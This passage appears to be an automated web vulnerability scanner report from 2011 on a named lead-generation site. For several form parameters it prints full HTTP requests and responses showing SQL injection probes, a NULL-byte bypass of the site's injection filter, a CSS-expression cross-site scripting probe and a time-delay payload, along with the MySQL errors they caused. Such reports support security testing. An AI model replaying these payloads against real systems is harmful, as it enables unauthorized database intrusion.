select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_398 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_398 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No%00'&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6798 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1969__Business expansion&attributeId_400=1976__Yes&attributeId_401=1980__$5,0' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No%00''&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_399%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_399%5B%5D parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=583vkpn5idu9k1e8l9t6g0ns91; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_400 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_400 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes'&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:34 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000 - 9,999&attributeId_402=1989__6-12 Months&attributeId_403=1995__$1,000 - 9,9' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes''&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33404
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_400 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_400 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=t4muvknffn020rjnaemi7cu5n5; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_401 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_401 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ega4cm6uredshqpbj444k6eck0; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_402 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_402 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months'&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000 - 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Comp' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months''&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_402 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_402 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8peu16fgi0ab1vf9qm5n04iuf3; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_403 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_403 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:21 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ret7a2erkc0vssl8pt2cgrlrf4; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999'&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_403 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_403 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999'&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:44 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999''&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_404 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_404 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:04:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=</a style=x:expre/**/ssion' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:04:10 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_404 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_404 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pk8u5fp0990124ap06fpq2ad86; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The button3 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the button3 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:42 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ajeec42ifbrtv7niv18775sdu6; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
